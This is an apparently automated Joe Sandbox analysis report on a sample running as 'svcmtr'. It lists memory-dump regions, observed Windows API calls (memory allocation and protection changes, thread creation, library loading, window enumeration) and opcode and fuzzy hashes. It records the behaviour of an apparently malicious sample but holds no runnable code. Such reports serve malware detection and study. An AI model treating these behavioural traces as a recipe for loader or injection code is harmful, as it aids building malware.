                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 002B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                              • Part of subcall function 002B1DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: 42bbf0a5ccf9b8719348ae749bb8d868705d99ab08546b6f3cea20931819eb6e
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 2E612A72E34329CFDB19CE64CC917EDB772FB84344F6586AAC006AB244DBB059658F81

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 9cc8bdb2c234d1a4116eea10b9e0f19c2f419205d39da107d141c6369f01fff2
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 72919A76A30726DAFF1D5674CC66BFD6416E7E0780F68E52CA203D9583DEFC48649A00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: 57047f3ebd9402dd144356ef86d737a4be7a2c3d167fe2e792e7eedc96d29eec
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: BE51D637E201249FEB0CCF69CC91AADB7B2FBD4310F5A9139D406EF691DA7899108640

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B1666
                                                                                                                              • Part of subcall function 002B172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 81e99b242fd930047296dd04786440dda9be65bea87cb8d61408d0763955a224
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: 59416E33A304129AEB0C5B68CDB5BFDA699E7D4380FADD53DA103DA1C6DEBC48709550

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 5c0b47c4cc10713c3feb84e6d6fdfc648a815ab905aeea267f5b3ae886a2a865
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 8C41A537E20124DFDF0CCF99D891AACB7B2FBD4310F5A9169D816AF691DB7499108A80

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B1666
                                                                                                                              • Part of subcall function 002B172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 7c59d33eb90027e264d6881b8cea546adcaa6af0e902a015457d335e3254ba20
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: 66414D33A301129BDB0C5BA8CDB56FDB799EBD4381FADD62D9003DA186DFB84470A650

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 57b8d43680b2ca870daad4f13bdbd6d078abb00736426198be742142b6c840f3
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: 0671697AA34712DAFB1C22B8CC66BFD6406E7E0781F6CE93DA203D9583CEEC44649500

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: b92905a5f196504d8c75a37fb08495eaa99059afcd1cfad10a50aac7ead7d960
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: 04619B36A30712DAFB1C62B8CC66BFD6456EBE0390F6CE53DA203D8593CEEC04649900

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph; legend: Executed / Not Executed. Entry block 2b1f25-2b1f3b; named API calls in the graph: CreateThread, RtlExitUserThread]
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph; legend: Executed / Not Executed. Entry block 2b1013-2b109c; named API calls in the graph: LoadLibraryA]
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617

                                                                                                                            Control-flow Graph

                                                                                                                            [Control-flow graph; legend: Executed / Not Executed. Entry block 2b1f30-2b1f3b; named API calls in the graph: CreateThread, RtlExitUserThread]
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(002B089C,00000000), ref: 002B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 002B2124
                                                                                                                              • Part of subcall function 002B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction ID: 3ed3e6c30f26e33eccaaf401313b6df315f22554123ff42f8127755bf83500ae
                                                                                                                            • Opcode Fuzzy Hash: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction Fuzzy Hash: FAB092A2730A2244EE1C22B49C2B7E4804CA6E4756B58A8564593D8497E8D882804040
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 5e1d212f51ab32ea981ca59fe708d56ef9b1507cad56df469f14c18ab83994ab
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: E1317F71D3023A9EDF1D5A60CC61FFD7632FB907C0FA88269D907A6141DBB04E709A90
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: ad4c70635be429ddfc3eb1350ce4c63eaf03333e36cde1a52e2a9742b78d8832
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: EE012B31D3012A9ADF294A24CC69FFD7671FB90740F588259D84BE5042DB704A71CE80
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d24294e354cf50e0e1ff5a61fb9a1d7444515576e9a652d1367347c40228d6a7
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: 4C01F471D3012A9AEF294E30CC69FFE7635FB90784F548299D94AE2041EB304E72CE80

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:317
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
